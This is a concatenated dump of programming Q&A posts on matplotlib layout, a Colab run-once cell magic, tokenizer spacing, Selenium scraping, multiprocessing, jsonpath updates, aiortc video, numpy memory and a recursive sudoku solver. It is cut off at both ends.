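Inside Docker the same problem has a second form: the file must actually be `COPY`ed into the image at the path the code uses, and `env_or_file=` first consults an environment variable of that name before looking for a file.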
<python><configuration><artificial-intelligence><openai-api><ms-autogen>
2024-01-14 17:06:36
0
457
MMsmithH
77,815,874
4,105,440
Placing images in an already existing matplotlib axis side by side
<p>Starting from an already existing matplotlib figure I added a footer by appending a small axis to the bottom. The idea is to fill this footer with an arbitrary number of logos. I want to place the logos side by side (separated by a user controllable pad parameter) so that they fill the footer in height, thus computing their width so as to maintain the aspect ratio locked.</p> <p>This is a standalone MRE which summarizes my approach</p> <pre class="lang-py prettyprint-override"><code>from matplotlib.image import imread as read_png import matplotlib.cbook as cbook import matplotlib.pyplot as plt import numpy as np from mpl_toolkits.axes_grid1 import make_axes_locatable from matplotlib.offsetbox import AnnotationBbox, OffsetImage fig = plt.figure(1, figsize=(6, 6)) ax = plt.gca() ax.set_axis_off() X, Y = np.meshgrid(np.linspace(-3.0, 3.0, 100), np.linspace(-2.0, 2.0, 100)) Z1 = np.exp(-X**2 - Y**2) Z2 = np.exp(-(X * 10)**2 - (Y * 10)**2) z = Z1 * 30 + 50 * Z2 cs = ax.contourf(X, Y, z, cmap='PuBu_r') ax_divider = make_axes_locatable(ax) ax_footer = ax_divider.append_axes( &quot;bottom&quot;, size=&quot;10%&quot;, pad=0.1) ax_footer.set_axis_off() def add_logo(ax, logo, zoom, pos): img_logo = OffsetImage(read_png(logo), zoom=zoom) logo_ann = AnnotationBbox( img_logo, pos, xycoords='axes fraction', frameon=False, box_alignment=(0, 0.25)) at = ax.add_artist(logo_ann) return at add_logo(ax_footer, cbook.get_sample_data('grace_hopper.jpg'), zoom=0.07, pos=(0, 0)) add_logo(ax_footer, cbook.get_sample_data('grace_hopper.jpg'), zoom=0.07, pos=(0.2, 0)) plt.show() </code></pre> <p>which produces</p> <p><a href="https://i.sstatic.net/oyvLL.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/oyvLL.png" alt="enter image description here" /></a></p> <p>However I have to explicitly set up <code>zoom</code> and <code>pos</code> so that the figures occupy the right space. 
Is there a way to automatically compute these parameters so that the figures are automatically placed next to each other and they fill the footer axis? Or maybe there is a better approach to that?</p> <p>I saw many examples defining a subplots with different rows and columns to place the figures but I already have the axis. I haven't found any way to split an already existing axis into an arbitrary number of inset axes of the same width.</p> <p>-------- EDIT --------------</p> <p>Expanding on the amazing answer of Jody Klymak this is my &quot;final&quot; version. Once you have a generic axis to put the logos in (I still use <code>make_axes_locatable</code> and <code>append_axes</code>) you can just use this function</p> <pre class="lang-py prettyprint-override"><code>def add_logos(ax, logos, x_padding=10): left = 0 for _, logo in enumerate(logos): imdata = read_png(logo) w = imdata.shape[1] h = imdata.shape[0] ax.imshow(imdata, extent=[left, left + w, 0, h]) left = left + w + x_padding # set the limits, otherwise the focus in on the last image ax.set_xlim(0, left) ax.set_ylim(0, h) # anchor the fixed aspect-ratio axes on the left. ax.set_anchor('W') </code></pre> <p>To be used as</p> <pre class="lang-py prettyprint-override"><code>add_logos(ax_footer, [&quot;../input/logos/Logonuovo.png&quot;, &quot;../input/logos/earth_networks_logo.png&quot;]) </code></pre>
<python><matplotlib>
2024-01-14 16:46:43
1
673
Droid
77,815,745
11,748,924
Preventing multiple runs of a cell in google colaboratory
<p>Here is I define <code>run_once</code> cell magic in order to prevent multiple output in same code in google colaboratory. If it's happen while code is not changed, it will display history output without actual computation like first run.</p> <pre><code>#@title Mendefinisikan Fungsi `run_once` from IPython.core.magic import register_cell_magic from IPython.display import display, HTML from google.colab import output from hashlib import sha1 import time import os @register_cell_magic def run_once(line: str, cell: str): &quot;&quot;&quot; This is a custom cell magic command in order to prevent multiple runs, so the cell must be run once for every runtime. If the cell has already run before, then it will display the history output. Usage: %%run_once &quot;&quot;&quot; try: # Argument of this magic cell is specifying tracker directory tracker_dir = line if len(tracker_dir) == 0: tracker_dir = './.run_once' # Set default if not specified. # Create input-output tracker directory if not os.path.exists(tracker_dir): os.makedirs(tracker_dir) # Get cell id by cell changes with SHA-1 as identifier cell_id = sha1(cell.encode('utf-8')).hexdigest() # Check wether cell_id.html already exists. (Imply the cell already run) if os.path.exists(f'{tracker_dir}/{cell_id}.html'): with open(f'{tracker_dir}/{cell_id}.html', 'r') as file_cell_output: html_output = file_cell_output.read() last_created = time.strftime('%Y-%m-%d %H:%M:%S UTC+00', time.gmtime(os.path.getctime(f'{tracker_dir}/{cell_id}.html'))) print(f'This cell ({cell_id}) already ran before, last run was:', last_created, ', displaying history output...\n') display(HTML(html_output)) return # Execute actual code. exec(cell, globals(), locals()) # After code has executed, it will contains some output. Save it! 
html_output = output.eval_js('document.getElementById(&quot;output-area&quot;).innerHTML;') with open(f'{tracker_dir}/{cell_id}.html', 'w') as file_cell_output: file_cell_output.write(html_output) # Also save the cell code for archive purposes with open(f'{tracker_dir}/{cell_id}.cell.py', 'w') as file_cell_input: file_cell_input.write(cell) except Exception as e: print(f&quot;run_once error: {str(e)}&quot;) </code></pre> <p>Usage example:</p> <pre><code>%%run_once print(&quot;This is an example of a cell that can't be run multiple times&quot;) </code></pre> <p>But I have a problem when the cell is not Python syntax, such as a shell command:</p> <pre><code>%%run_once !ls current_directory </code></pre> <p>It returns:</p> <pre><code>run_once error: invalid syntax (&lt;string&gt;, line 2) </code></pre> <p>It also doesn't seem to work for defining a global variable:</p> <pre><code>#CELL A %%run_once myvar = 5 </code></pre> <p>When I <code>print(myvar)</code> in cell B, it says <code>myvar</code> is not defined. But it works the other way around: if I define <code>myvar</code> in a cell without the <code>run_once</code> magic, I can print <code>myvar</code> in a cell that uses <code>run_once</code>.</p> <p>I suspect this is because it uses <code>exec</code>.</p> <p>For more screenshots about its usage, see the GitHub repository: <a href="https://github.com/wawan-ikhwan/run-once-colab" rel="nofollow noreferrer">run-once-colab</a></p>
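Not part of the original post: a minimal plain-Python sketch (outside IPython) of why the `exec`-based approach loses global variables. Inside a function, `exec(cell, globals(), locals())` writes assignments into a throwaway `locals()` mapping; executing into one shared dictionary avoids it. For the shell-command failure, IPython's `get_ipython().run_cell(cell)` applies IPython's own input transformations (including `!` syntax), so it may be a better fit than `exec`; verify against your IPython version.

```python
def run_with_locals(cell):
    # Assignments land in a throwaway locals() dict and are discarded.
    exec(cell, globals(), locals())

shared_ns = {}

def run_with_shared_ns(cell):
    # Assignments persist in the shared mapping passed as globals.
    exec(cell, shared_ns)

run_with_locals("lost_var = 5")
print("lost_var" in globals())   # False: the assignment was discarded

run_with_shared_ns("kept_var = 5")
print(shared_ns["kept_var"])     # 5: visible to later cells sharing the mapping
```

In the magic, replacing `exec(cell, globals(), locals())` with an `exec` into a single persistent namespace dict (or a `run_cell` call) should make definitions visible to later cells.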
<python><jupyter-notebook><jupyter><google-colaboratory>
2024-01-14 16:09:22
1
1,252
Muhammad Ikhwan Perwira
77,815,725
2,991,243
Unmasking adds an extra whitespace for BPE tokenizer
<p>I created a custom BPE tokenizer for pre-training a Roberta model, utilizing the following parameters (I tried to align it with the default parameters of BPE for RoBERTa.):</p> <pre><code>from tokenizers.models import BPE from tokenizers import ByteLevelBPETokenizer from tokenizers.processors import RobertaProcessing tokenizer = ByteLevelBPETokenizer() tokenizer.normalizer = normalizers.BertNormalizer(lowercase = False) tokenizer.train_from_iterator(Data_full, vocab_size = 50264, min_frequency = 2, special_tokens = [&quot;&lt;s&gt;&quot;, &quot;&lt;pad&gt;&quot;, &quot;&lt;/s&gt;&quot;, &quot;&lt;unk&gt;&quot;]) tokenizer.add_special_tokens([&quot;&lt;mask&gt;&quot;]) tokenizer.post_processor = RobertaProcessing(sep = (&quot;&lt;/s&gt;&quot;, 2), cls = (&quot;&lt;s&gt;&quot;, 0), trim_offsets = False, add_prefix_space = False) tokenizer.enable_padding(direction = 'right', pad_id = 1, pad_type_id = 1, pad_token = &quot;&lt;pad&gt;&quot;, length = 512) </code></pre> <p>When pre-training a Roberta model with this tokenizer, I observe unusual behavior during the unmasking process:</p> <pre><code>from tokenizers import Tokenizer from transformers import pipeline from transformers import RobertaTokenizerFast tokenizer_in = Tokenizer.from_file('tokenizer_file') tokenizer_m = RobertaTokenizerFast(tokenizer_object=tokenizer_in, clean_up_tokenization_spaces=True) unmasker = pipeline('fill-mask', model=model_m, tokenizer = tokenizer_m) unmasker(&quot;Capital of France is &lt;mask&gt;.&quot;) </code></pre> <p>The output consistently appears as follows: <code>Capital of France is Paris</code>. I'm curious about the persistent extra space before 'Paris'. I believe activating the <code>clean_up_tokenization_spaces</code> option might resolve this. Could there be an error in my code leading to this issue? This happens for all unmasking tasks. 
Also, when I conduct a test with a command like <code>unmasker(&quot;Capital of France is&lt;mask&gt;.&quot;)</code>, the quality improves and the issue seems to be resolved.</p>
<python><huggingface-transformers><tokenize><huggingface><huggingface-tokenizers>
2024-01-14 16:03:00
1
3,823
Eghbal
77,815,713
1,208,142
Accessing element in web page using Selenium with Python
<p>I can't seem to scrape the description on this page: <a href="https://www.centris.ca/fr/condo-appartement%7Ea-louer%7Ebrossard/17307615?view=Summary&amp;uc=6" rel="nofollow noreferrer">https://www.centris.ca/fr/condo-appartement~a-louer~brossard/17307615?view=Summary&amp;uc=6</a></p> <p>With this selector (which I copied from Chrome's inspector), I don't get an error but an empty string. Any idea what &quot;by&quot; method I could use to access it?</p> <pre><code>from selenium import webdriver from selenium.webdriver.chrome.service import Service from webdriver_manager.chrome import ChromeDriverManager from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By from selenium_stealth import stealth # Selenium setup service = Service(ChromeDriverManager().install()) options = webdriver.ChromeOptions() options.add_argument(&quot;--headless&quot;) options.add_argument(&quot;start-maximized&quot;) options.add_experimental_option(&quot;excludeSwitches&quot;, [&quot;enable-automation&quot;]) options.add_experimental_option('useAutomationExtension', False) browser = webdriver.Chrome(service=service, options=options) browser.set_page_load_timeout(300) stealth(browser, languages=[&quot;en-US&quot;, &quot;en&quot;], vendor=&quot;Google Inc.&quot;, platform=&quot;Win32&quot;, webgl_vendor=&quot;Intel Inc.&quot;, renderer=&quot;Intel Iris OpenGL Engine&quot;, fix_hairline=True) url = 'https://www.centris.ca/fr/condo-appartement~a-louer~brossard/17307615?view=Summary&amp;uc=6' browser.get(url) browser.implicitly_wait(3) browser.maximize_window() # Extract necessary information url = browser.current_url print(&quot;URL:&quot;, url) descr = browser.find_element(By.CSS_SELECTOR, '#overview &gt; div.grid_3 &gt; div.row.description-row &gt; div.property-description.col-md-6 &gt; div:nth-child(2)').text print(descr) </code></pre>
<python><selenium-webdriver>
2024-01-14 15:59:00
3
5,347
Lucien S.
77,815,644
14,954,262
For loop with random number of conditions
<p>I have this code for filtering lists in Python:</p> <pre><code>column_to_check_for_include = [ 1, 2, ] # random result possible , could as well be [0] or [0,1,2] or whatever column_to_check_for_exclude = [ 0, 2, 3, ] # random result possible , could as well be [0] or [0,1,2] or whatever content = [ [&quot;John&quot;, &quot;is&quot;, &quot;cool&quot;, &quot;sometimes&quot;], [&quot;Paul&quot;, &quot;is&quot;, &quot;bad&quot;, &quot;everytime&quot;], [&quot;Ringo&quot;, &quot;may be&quot;, &quot;great&quot;, &quot;sometimes&quot;], [&quot;Georges&quot;, &quot;must be&quot;, &quot;small&quot;, &quot;yesterday&quot;], ] include_criteria = [&quot;is&quot;, &quot;must be&quot;] exclude_criteria = [&quot;bad&quot;, &quot;sometimes&quot;] for row in content: if all( exclude not in row[0] and exclude not in row[2] and exclude not in row[3] for exclude in exclude_criteria ): if any( include in row[1] or include in row[2] for include in include_criteria ): print(row) # output ['Georges', 'must be', 'small', 'yesterday'] </code></pre> <p>I would like to do the same by replacing all the <code>row[number]</code> by iterating through the lists <code>column_to_check_for_include</code> and <code>column_to_check_for_exclude</code>, knowing that those 2 lists content will change each time the user update them.</p> <p>Something like :</p> <pre><code>for row in content: if all( exclude not in row[column_to_check_for_exclude[0]] and exclude not in row[column_to_check_for_exclude[1]] and exclude not in row[column_to_check_for_exclude[2]] for exclude in exclude_criteria ): if any( include in row[column_to_check_for_include[0]] or include in row[column_to_check_for_include[1]] for include in include_criteria ): print(row) </code></pre> <p>Maybe I need to re-think the whole approach but I don't know how to deal with the fact that the number of conditions will change in the <code>if</code> statements (depending on the number of items in the lists).</p> <p>Thanks</p>
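One way to collapse the hard-coded `row[0]`/`row[2]`/`row[3]` checks is to nest a second loop over the column lists inside the generator expressions, so the number of conditions follows the length of the lists automatically. A sketch using the question's own data:

```python
column_to_check_for_include = [1, 2]
column_to_check_for_exclude = [0, 2, 3]

content = [
    ["John", "is", "cool", "sometimes"],
    ["Paul", "is", "bad", "everytime"],
    ["Ringo", "may be", "great", "sometimes"],
    ["Georges", "must be", "small", "yesterday"],
]

include_criteria = ["is", "must be"]
exclude_criteria = ["bad", "sometimes"]

matches = []
for row in content:
    # no excluded word may appear in any of the exclude columns ...
    excluded = any(
        exclude in row[col]
        for exclude in exclude_criteria
        for col in column_to_check_for_exclude
    )
    # ... and at least one included word must appear in an include column
    included = any(
        include in row[col]
        for include in include_criteria
        for col in column_to_check_for_include
    )
    if not excluded and included:
        matches.append(row)

print(matches)  # [['Georges', 'must be', 'small', 'yesterday']]
```

Updating `column_to_check_for_include`/`column_to_check_for_exclude` changes the number of checks without touching the loop body.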
<python><for-loop><random>
2024-01-14 15:37:22
1
399
Nico44044
77,815,379
639,676
How to speed up data exchange between Python processes?
<p>I'm using Python's <code>multiprocessing</code> module for parallel processing of tasks. My goal is to have multiple processes work cooperatively on a set of tasks as efficiently as possible. To avoid duplicating work, I'm using a shared dictionary to track completed tasks. If a task is already completed by one process, other processes should skip it and pick a different task.</p> <p>However, I've encountered a performance bottleneck. The process of checking the shared dictionary for completed tasks is significantly slowing down the overall execution. Here's a simplified version of my code:</p> <pre><code>import multiprocessing import random def worker(shared_dict): for i in range(1000000): num = random.randint(1, 100000) if num not in shared_dict: shared_dict[num] = num**2 # computationally complex task if __name__ == &quot;__main__&quot;: # Create a manager and a shared dictionary manager = multiprocessing.Manager() shared_dict = manager.dict() # List to keep track of processes processes = [] # Create and start 5 processes for _ in range(5): p = multiprocessing.Process(target=worker, args=(shared_dict,)) processes.append(p) p.start() # Wait for all processes to complete for p in processes: p.join() print(shared_dict) </code></pre> <p>I used PySpy for profiling and noticed that a significant amount of time is spent in sending and receiving data from the shared dictionary (as shown in the attached profiling image).</p> <p><a href="https://i.sstatic.net/cZ4un.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/cZ4un.png" alt="enter image description here" /></a></p> <p>I'm looking for suggestions to optimize this data exchange. Is there a more efficient way to manage shared data in Python multiprocessing? How can I reduce the overhead associated with accessing and modifying the shared dictionary? I am willing to accept some duplications if it allows to dramatically increase performance</p>
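Since some duplicated work is acceptable, one option is to drop the shared dictionary entirely: every access to a `Manager().dict()` is a proxied round-trip to the manager process, so each worker can instead fill a plain local dict (no per-item IPC) and the partial results can be merged once at the end. A sketch (worker counts and task sizes are illustrative, not from the original post):

```python
import multiprocessing
import random

def worker(n_tasks):
    local = {}  # plain dict: no inter-process round-trip per lookup
    for _ in range(n_tasks):
        num = random.randint(1, 100000)
        if num not in local:
            local[num] = num ** 2  # stand-in for the expensive task
    return local

def run(n_workers=5, n_tasks=1000):
    with multiprocessing.Pool(n_workers) as pool:
        partials = pool.map(worker, [n_tasks] * n_workers)
    merged = {}
    for part in partials:
        merged.update(part)  # duplicate keys across workers collapse here
    return merged

if __name__ == "__main__":
    merged = run()
    print(len(merged))
```

Some tasks may be computed twice by different workers, but the per-item synchronization cost disappears, which is usually a large net win when the shared-dict traffic dominates.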
<python><python-3.x><multiprocessing>
2024-01-14 14:17:23
0
4,143
Oleg Dats
77,815,182
10,544,569
In python how to update node at jsonpath with filter?
<p>I want to update node at json path with filtering (e.g. json path with such part &quot;[@.field]&quot;).</p> <p>My current attempts with jsonpath_ng failed:</p> <pre><code>import jsonpath_ng.ext import jsonpath_ng from hashlib import md5 # try several ways to transform {&quot;a&quot;: {&quot;b&quot;: &quot;c&quot;}} into {&quot;a&quot;: {1: 2}} for jpath_str in [&quot;$.a&quot;, &quot;$[?(@.b)]&quot;, &quot;$.a.b.`parent`&quot;]: for jp_lib in [jsonpath_ng, jsonpath_ng.ext]: obj = json.loads('{&quot;a&quot;: {&quot;b&quot;: &quot;c&quot;}}') print(f&quot;jp_lib={jp_lib.__name__:&lt;15} json_path_str={jpath_str:&lt;15}&quot;, end=&quot;\t&quot;) try: # find a node, and then attempt to update it jpath = jp_lib.parse(jpath_str) matches = jpath.find(obj) if not matches: print(&quot;--&gt; Not found&quot;) continue for match in matches: print(f&quot;match={md5(str(match).encode()).hexdigest()[:-10]}&quot;, end=&quot;\t&quot;) jpath.update(obj, {1:2}) print(f&quot;--&gt; result={obj}&quot;, end=&quot;\t&quot;) if &quot;b&quot; in obj['a']: print(&quot; --&gt;Update failed silently&quot;, end=&quot;\t&quot;) except Exception as ex: print(f&quot;--&gt; exception={type(ex).__name__}({ex})&quot;, end=&quot;\t&quot;) print() </code></pre> <p>Output:</p> <pre><code>jp_lib=jsonpath_ng json_path_str=$.a match=6d6c26aced0709ca568e84 --&gt; result={'a': {1: 2}} jp_lib=jsonpath_ng.ext json_path_str=$.a match=6d6c26aced0709ca568e84 --&gt; result={'a': {1: 2}} jp_lib=jsonpath_ng json_path_str=$[?(@.b)] --&gt; exception=JsonPathLexerError(Error on line 1, col 2: Unexpected character: ? ) jp_lib=jsonpath_ng.ext json_path_str=$[?(@.b)] match=6de1848d9db98d7d1c6766 --&gt; result={'a': {'b': 'c'}} --&gt;Update failed silently jp_lib=jsonpath_ng json_path_str=$.a.b.`parent` match=6d6c26aced0709ca568e84 --&gt; exception=NotImplementedError() jp_lib=jsonpath_ng.ext json_path_str=$.a.b.`parent` match=6d6c26aced0709ca568e84 --&gt; exception=NotImplementedError() </code></pre>
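Until the filter-based update works in jsonpath_ng, one dependency-free fallback is to apply the predicate yourself with a small recursive walker. This is a sketch, not a jsonpath_ng fix; the predicate below emulates `$[?(@.b)]`:

```python
import json

def update_where(node, pred, new_value):
    """Replace every child of `node` (recursively) that satisfies `pred`."""
    if isinstance(node, dict):
        items = node.items()
    elif isinstance(node, list):
        items = enumerate(node)
    else:
        return
    for key, value in list(items):  # snapshot: we mutate while walking
        if pred(value):
            node[key] = new_value
        else:
            update_where(value, pred, new_value)

obj = json.loads('{"a": {"b": "c"}}')
# emulate $[?(@.b)]: any dict that has a "b" key
update_where(obj, lambda v: isinstance(v, dict) and "b" in v, {1: 2})
print(obj)  # {'a': {1: 2}}
```

This sidesteps both the silent-failure and `NotImplementedError` cases in the output table.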
<python><jsonpath>
2024-01-14 13:18:08
1
1,325
IndustryUser1942
77,815,033
726,730
Python aiortc video delay (after some seconds the remote video is frozen)
<p>I am trying to connect a browser peer with a server-side Python peer.</p> <p>The code I use to stream server video is:</p> <pre class="lang-py prettyprint-override"><code> def create_local_tracks(self): global relay, webcam options = {&quot;video_size&quot;: &quot;640x480&quot;} if relay is None: if platform.system() == &quot;Darwin&quot;: webcam = MediaPlayer( &quot;default:none&quot;, format=&quot;avfoundation&quot;, options=options ) elif platform.system() == &quot;Windows&quot;: # this will be run webcam = MediaPlayer( &quot;video=HP True Vision HD Camera&quot;, format='dshow', options=options ) else: webcam = MediaPlayer(&quot;/dev/video0&quot;, format=&quot;v4l2&quot;, options=options) relay = MediaRelay() return relay.subscribe(webcam.video) </code></pre> <p>The problem is that on the client side the video stream starts, but the latency is high. Furthermore, after some seconds the remote video in the client almost freezes.</p> <p>I am not sure this is related, but I see this in the console:</p> <pre><code>[swscaler @ 000001f35386bb40] deprecated pixel format used, make sure you did set range correctly </code></pre> <p>a lot of times.</p> <p>How can I decrease the server video delay in the client (browser)?</p>
<python><webrtc><aiortc>
2024-01-14 12:27:52
0
2,427
Chris P
77,815,006
1,473,517
Find the optimal shift for max circle sum
<p>I have an n by n grid of integers which sits in an infinite grid and I want to find the circular area, with origin at (x, x) (notice that both dimensions are equal), with maximum sum. I assume that x &lt;= 0. Here is an illustration with n=10 of two circles with different centers and different radii. Only one quarter of the circles is shown as any part outside of the n by grid contributes zero to the sum.</p> <p>For a fixed circle center, there is an efficient method to find the radius which maximises the sum of the integers contained within a circle. The following <a href="https://stackoverflow.com/a/77795777/1473517">code</a> solves the problem.</p> <pre><code>from collections import Counter g = [[-3, 2, 2], [ 2, 0, 3], [-1, -2, 0]] n = 3 sum_dist = Counter() for i in range(n): for j in range(n): dist = i**2 + j**2 sum_dist[dist] += g[i][j] sorted_dists = sorted(sum_dist.keys()) for i in range(1, len(sorted_dists)): sum_dist[sorted_dists[i]] += sum_dist[sorted_dists[i-1]] print(sum_dist) print(max(sum_dist, key=sum_dist.get)) </code></pre> <p><a href="https://i.sstatic.net/3Unsh.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/3Unsh.png" alt="enter image description here" /></a></p> <p>However, if I were to set the center to (x, x) with x &lt; 0 instead the maximum possible sum may be different.</p> <p>How can I find the center and the radius which maximizes the sum of the integers within the circle?</p> <p>The data in the illustration is:</p> <pre><code> [[ 3, -1, 1, 0, -1, -1, -3, -2, -2, 2], [ 0, 0, 3, 0, 0, -1, 2, 0, -2, 3], [ 2, 0, 3, -2, 3, 1, 2, 2, 1, 1], [-3, 0, 1, 0, 1, 2, 3, 1, -3, -1], [-3, -2, 1, 2, 1, -3, -2, 2, -2, 0], [-1, -3, -3, 1, 3, -2, 0, 2, -1, 1], [-2, -2, -1, 2, -2, 1, -1, 1, 3, -1], [ 1, 2, -1, 2, 0, -2, -1, -1, 2, 3], [-1, -2, 3, -1, 0, 0, 3, -3, 3, -2], [ 0, -3, 0, -1, -1, 0, -2, -3, -3, -1]] </code></pre>
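One brute-force extension of the code above, assuming the candidate centers (x, x) can be restricted to a known range x ≤ 0: rerun the same Counter-based radius search once per candidate center and keep the best cumulative sum overall. Each center costs O(n²), so the total is O(n² · number of candidates). This is a sketch, not an asymptotically optimal algorithm, and the `min_x` bound is an assumption:

```python
from collections import Counter

def best_circle(g, min_x=-3):
    """Try centers (x, x) for min_x <= x <= 0; return (best_sum, center, radius_sq)."""
    n = len(g)
    best = (float("-inf"), None, None)
    for cx in range(min_x, 1):
        sums = Counter()
        for i in range(n):
            for j in range(n):
                dist = (i - cx) ** 2 + (j - cx) ** 2
                sums[dist] += g[i][j]
        running = 0
        for dist in sorted(sums):  # prefix sums over increasing radius
            running += sums[dist]
            if running > best[0]:
                best = (running, (cx, cx), dist)
    return best

g = [[-3, 2, 2], [2, 0, 3], [-1, -2, 0]]
print(best_circle(g))  # the best achievable sum on this grid is 3
```

In practice the useful range of x is bounded, because once the center is far enough away the circle boundary through the grid approaches a straight line and the candidate sums stop changing.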
<python><algorithm><performance><math><optimization>
2024-01-14 12:18:45
1
21,513
Simd
77,814,939
5,798,365
Double elements of a list with specific indices stored in another list
<p>I have this list:</p> <pre><code>L=[10, 20, 30, 40, 50, 60, 70, 80, 90] </code></pre> <p>and a list of indices of the elements that should be doubled, for example:</p> <pre><code>dbl_indices = [0, 2, 5] </code></pre> <p>which should turn my list into:</p> <pre><code>[20, 20, 60, 40, 50, 120, 70, 80, 90] </code></pre> <p>Besides iterating in a <code>for</code>-loop over the list of indices, what is another, more Pythonic way of doing that?</p>
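One comprehension-based alternative (a sketch; converting the indices to a set keeps membership tests O(1)):

```python
L = [10, 20, 30, 40, 50, 60, 70, 80, 90]
dbl_indices = [0, 2, 5]

to_double = set(dbl_indices)  # O(1) membership tests
L = [v * 2 if i in to_double else v for i, v in enumerate(L)]
print(L)  # [20, 20, 60, 40, 50, 120, 70, 80, 90]
```

Note this builds a new list rather than mutating in place; if in-place mutation matters, the plain loop over `dbl_indices` is arguably just as Pythonic.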
<python>
2024-01-14 11:57:54
2
861
alekscooper
77,814,924
1,351,182
How can I explicitly free numpy array memory?
<p>How can I explicitly free the memory associated with a <code>numpy</code> array?</p> <p>As usual on Stackexchange, there are numerous questions with more-or-less the same title, but with no correct answer.</p> <p>Here is an example of the problem:</p> <pre class="lang-py prettyprint-override"><code>import numpy as np big_arr = ... def process_big_arr(arr: np.ndarray) -&gt; np.ndarray: big_intermediate_arr_1 = ... # some function of `arr`. del arr # This will not trigger garbage collection because a reference # to `big_arr` still exists in the outer scope. big_intermediate_arr_2 = ... # Memory error here, because I'm out of RAM. # I want the input array `arr` to be destroyed. I won't be using it again. big_output_arr = ... return big_output_arr output = process_big_arr(big_arr) </code></pre> <p>I couldn't find in the <code>numpy</code> docs a function which <em>mutates</em> an array in such a way that it deallocates memory.</p> <p>Is there any way to do this? Perhaps by editing the properties of the numpy array and changing its memory pointer or something?</p>
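One pattern that sidesteps the outer-scope reference: pass ownership of the array inside a mutable container and pop it out in the function, so that `del` really drops the last reference and CPython's refcounting frees the buffer immediately. A sketch (tiny array for illustration; `* 2` and `+ 1` stand in for the real processing):

```python
import numpy as np

def process_big_arr(arr_holder):
    # Take the ONLY reference out of the container, so `del` really frees it.
    arr = arr_holder.pop()
    intermediate = arr * 2          # some function of `arr`
    del arr                         # refcount hits zero -> buffer deallocated
    return intermediate + 1

holder = [np.ones(4)]
out = process_big_arr(holder)
print(holder)  # [] -- the caller kept no reference, so the memory was freed
```

There is no supported numpy call that deallocates a live array's buffer out from under existing references; transferring ownership like this (or restructuring so the big array is created inside the function) is the usual workaround.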
<python><numpy><memory-management>
2024-01-14 11:53:24
3
924
Myridium
77,814,729
1,473,517
How to emphasise a part of a circle in matplotlib
<p>I have the following code:</p> <pre><code>import matplotlib.pyplot as plt from matplotlib.patches import Circle import numpy as np plt.yticks(np.arange(-10, 10.01, 1)) plt.xticks(np.arange(-10, 10.01, 1)) plt.xlim(-10,9) plt.ylim(-10,9) plt.gca().invert_yaxis() # Set aspect ratio to be equal plt.gca().set_aspect('equal', adjustable='box') plt.grid() np.random.seed(40) square = np.empty((10, 10), dtype=np.int_) for x in np.arange(0, 10, 1): for y in np.arange(0, 10, 1): plt.scatter(x, y, color='blue', s=2, zorder=2, clip_on=False) for x in np.arange(0, 10, 1): for y in np.arange(0, 10, 1): value = np.random.randint(-3, 4) square[int(x), int(y)] = value r1 = 3 circle1 = Circle((0, 0), r1, color=&quot;blue&quot;, alpha=0.5, ec='k', lw=1) r2 = 6 circle2 = Circle((0, 0), r2, color=&quot;blue&quot;, alpha=0.5, ec='k', lw=1) plt.gca().add_patch(circle1) plt.gca().add_patch(circle2) </code></pre> <p>This shows:</p> <p><a href="https://i.sstatic.net/OMR3I.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/OMR3I.png" alt="enter image description here" /></a></p> <p>However I would like only the quarter of the circles that are over the x, y ranges 0 to 9 to be colored in and the rest to have a white background.</p> <p>How can I do that?</p>
<python><matplotlib>
2024-01-14 10:48:52
1
21,513
Simd
77,814,353
4,872,985
Repeating values on recursive sudoku solver in python
<p>I'm trying to make a sudoku solver using recursion by storing possible values in a dictionary with index as key and the set of possible values as value. Parameter b is just the board expressed as a single list, and .get_row, .get_col, .get_box methods return their respective values properly. If an entry in the dictionary has a set with a single element then it gets put into the board b, otherwise if there's no possible set with a single element a value gets picked from the set of possible numbers and the recursion starts. This is the full repeatable code:</p> <pre><code>class Sudoku: def solve_it(self, board: List[List[str]]) -&gt; None: &quot;&quot;&quot; :param board: sudoku board gets modified inplace at .create_board_from_list :return: None &quot;&quot;&quot; unit_values = [] for i in range(len(board)): # flattening the board into unit_values for j in range(len(board[i])): unit_values.append(board[i][j]) self.go_through_recursive(board, unit_values) def get_row(self, n: int, b): # retrieve all elements of nth row in the board assert 0 &lt;= n &lt;= 8 return set(b[9 * n: 9 * (n + 1)]) def get_col(self, n: int, b): # retrieve all elements of nth col in the board assert 0 &lt;= n &lt;= 8 return set(b[n::9]) def get_box(self, n: int, b): # retrieve all elements of nth box in the board assert 0 &lt;= n &lt;= 8 return set(b[i] for i in range(81) if (i // 27) == (n // 3) and i % 9 // 3 == n % 3) def go_through_recursive(self, board, b, d=False): &quot;&quot;&quot; :param board: sudoku board as matrix where each row is a line :param b: sudoku board as a single long list &quot;&quot;&quot; numbers = {'1', '2', '3', '4', '5', '6', '7', '8', '9'} while True: if d: return True missing_dict = {} # populate missing_dict for idx in range(len(b)): if b[idx] == '.': row, col, box = idx // 9, idx % 9, (idx // 27) * 3 + (idx % 9) // 3 # union of all the present values in current row, col and box values = self.get_row(row, b).union(self.get_col(col, b)).union(self.get_box(box, 
b)) values.remove('.') missing_ones = numbers.difference(values) # possible values to input in the slot if len(missing_ones) == 0: # impossible to continue return False missing_dict[idx] = missing_ones old_count = b.count('.') # now we iterate through the dictionary of possible values per index, # if one index has a set with a single number it means that that's the only possible number so we store it for idx, missings in missing_dict.items(): # store assured values if len(missings) == 1: b[idx] = missings.pop() if b.count('.') == 0: # check if complete self.create_board_from_list(board, b) return True if b.count('.') == old_count: # if no progress has been made for idx, s in missing_dict.items(): # iterate through the dictionary for number in s: # create a new board and store indecisive value then recur if d: return True bb = b[:] bb[idx] = number d = self.go_through_recursive(board, bb) def create_board_from_list(self, board, b): temp_board = [] chunk = 9 for idx in range(0, len(b), chunk): temp_board.append(b[idx: idx + chunk]) for idx in range(len(board)): board[idx] = temp_board[idx] print('done') </code></pre> <p>The issue I have is that once it completes, some numbers are repeated(either in the rows, cols or boxes).Also I 've noticed that if I check the possible values inside the ' store assured values ' loop it sometimes returns the whole range [1, 9] possibly being the reason of some rewriting:</p> <pre><code>row, col, box = idx // 9, idx % 9, (idx // 27) * 3 + (idx % 9) // 3 values = self.get_row(row, b).union(self.get_col(col, b)).union(self.get_box(box, b)) values.remove('.') # some of these values are [1, 9] </code></pre> <p>Given this board input:</p> <pre><code>board = 